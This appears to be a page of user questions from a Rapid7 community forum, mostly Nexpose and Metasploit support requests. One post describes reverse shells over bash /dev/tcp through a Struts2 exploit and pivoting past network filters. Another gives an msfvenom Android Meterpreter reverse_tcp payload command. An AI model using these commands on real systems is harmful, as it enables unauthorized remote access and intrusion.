We have a weekly SQL report that is telling us whether a scan was 'scheduled' or whether it was 'manual'. When the scans are scheduled, we'd like to see which user actually scheduled that scan. Then we can move our scheduled recurring scans to a service account, and separate out those from any one-off scans we schedule to run outside of business hours. Alternately if we can just report on which ones are recurring in the first place, that would accomplish the same thing. I can't seem to find these fields in the 'fact_scan' or 'dim_scan' schema, though. Is there a way to get this data without resorting to the Ruby gem? SELECT dim_site.name, started, finished, round(extract(EPOCH FROM (finished))-extract(EPOCH FROM (started))) as 'duration(s)', COUNT (asset_id) as assets, dss.description as status, dst.description as type FROM dim_scan JOIN dim_site_scan USING (scan_id) JOIN dim_site USING (site_id) JOIN dim_scan_type dst USING (type_id) JOIN dim_scan_status dss USING (status_id) JOIN dim_site_asset dsa USING (site_id) WHERE started > (current_date - interval '7 days') GROUP BY dim_site.name, started, finished, status, type ORDER BY started
Posted by Craig Rickel about a year ago
Hello and thanks for providing this forum. Our IT staff request that we provide them with reports that list vulnerability remediation grouped by server. They do not patch on a vulnerability by vulnerability basis, but rather sit at a server and remediate all of the vulnerabilities, and then move to the next server. I am looking for a template or SQL query that will list this information in the following way, or something similar if possible: Server001 Update to the latest version of Adobe Acrobat Server001 Update to the latest version of Java Server002 Update to the latest version of Mozilla Firefox They are not interested in how many vulnerabilities are present on each machine, that is our concern as the Security team. They are only interested in what needs to be done on each machine, grouped by machine. Thank you very much, and please have a nice day.
Posted by Monty Palmer about a year ago
Hello, there is a headache problem. The company assigned me a new rating client and I metasily vulnerable metasploit i but had a confusion I used strtus2 to send shells like bash> & / dev / tcp to the msf listening port, but the other took a Kind of strategy for two days I have no progress in progress each other all the WEB services into the network and open an Internet using NGINX porxy_pass the data from the external network sent to the network through the NGINX bounce back BASH SESSION 1 # Network analysis However, I use the shell to upgrade merterpreter, session 2 # into 192.168 this IP, the nodes in the transmission of data should also have a security filter strategy, not all ports can successfully send bash to my metasploit, Is there any way to get further results, I have been GOOGLE did not gain anything The other is WINDOWS VMWARE open centos 6.5 or uinx x86-64. In the WEB UI FOR console are not found to be compatible with the payload I still have CobaltStrike pro, can assists you Both with msf + CobaltStrike
Posted by Dennis about a year ago
Hello there. I'm running Nexpose Security Console version 6.4.63, trying to perform a CIS Microsoft Office 2016 policy scan against a Windows 7 workstation with Office 2016 (32-bit) installed. The scan is able to return a benchmark result for only PowerPoint 2016; none of the other Office applications are included in the report. It seems as though the detection mechanism within the scan is failing to find that Word, Excel, Outlook, etc. are installed. I have looked through the scan log, but I haven't been able to identify how Nexpose performs the Office application detection (if it is merely a registry value that is missing from our installation, I could "fake it" and write the value in manually on my reference computer). Does anyone have any suggestions about either a short-term workaround or a long-term fix for this issue? (Vulnerability scans for the same asset in the same site are working fine. Combining vulnerability scanning and policy scanning into a single scan template does not result in Office applications being detected.) Thank you very much, -Oliver
Posted by Oliver Baty about a year ago
I have my Symantec Endpoint Protection manager forwarding the logs to an rsyslog server running on Centos 7. I see the logs come into the /var/logs/message file. I have set the rsyslog.conf file to send the messages via TCP to the connector:port of the data collector. I can telnet to that port form the rsyslog server. When I turn debug on I am seeing an error TCPSendInit FAILED with -2027 Is there something I am missing?
Posted by Ben Bazian about a year ago
I am using Nexpose for the first time and after 36s of scan I get Local scan engine Failed (java.io.IOException: The Nmap exit value is not zero: -1073741819 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) ) What's wrong? Probably my setting?
Posted by Alen about a year ago
Can you customize the CIS templates for use in the scans or do you have to scan using the default CIS template provided? For example, we may not need the level 2 settings in the CIS benchmark. Can we eliminate those from the scanning template we use?
Posted by Jeff Krumholz about a year ago
Iv'e installed metasploit for windows , but at first I tried to do it via bash terminal in the windows 10 Ubuntu beta version (this is a separate issue as I get the error "warning files already exist" or something to that effect.) I mention this in case it matters. I've gotten the installer to run and install , but the database does not work with the "postgres selected not connected" error. Tried editing the yml file , directing it to the yml but still nothing. I am wondering if I must start the server in windows cmd but how do I do this? The installer I belive should have added the path variables so I don't think that's the problem. Please help. thanks. any more info you need I will provide.
Posted by joe aggs about a year ago
whenever I try starting a meterpreter session it always dies and the result is like this [*] Meterpreter session 3 opened (10.0.0.244:444 -> 18.104.22.168:34276) at 2017-11-21 13:17:10 -0800 [*] 22.214.171.124 - Meterpreter session 3 closed. Reason: Died my lport=444 lhost=(my internal ip) and my package command is msfvenom -p android/meterpreter/reverse_tcp lhost=(public ip) lport=444 and I have the port-forwarding enable on the port 444 please help
Posted by HaydenSeward about a year ago
I am setting up a new virtual appliance. When I click on the management tab, a wizard runs and attempts to connect me to the Insight management platform. I accept the terms, choose a region, and I get an error message that says, "Unable to OnBoard" followed by "Please check that time on your machine is up to date, or use an NTP service." The time is set to automatically sync and appears to be up to date. How can I get past this error?
Posted by Andrew Woodworth about a year ago
I am running in AWS govcloud and I ams trying to set up the connection. When I select Amazon Web Servcies, Govcloud is not availale. When I select AWS active sync, it is available, but i only see AWS active sync if I create the connection when going through administator to create the connection, not when creating a site. First: Are there any known issues connecting my Nexpose instance running in my Govcloud VPC to Amazon Web Services
Posted by Robert Neil about a year ago
With the recent announcement from Intel about their new tool to check for the ME, SPS, and TXE vulnerabilities is Nexpose going to be able to scan for them as well? I searched the database and didn't see any of the CVEs in Intel's release listed. Link to Intel's announcement: https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&languageid=en-fr Thanks.
Posted by Jake Dawley about a year ago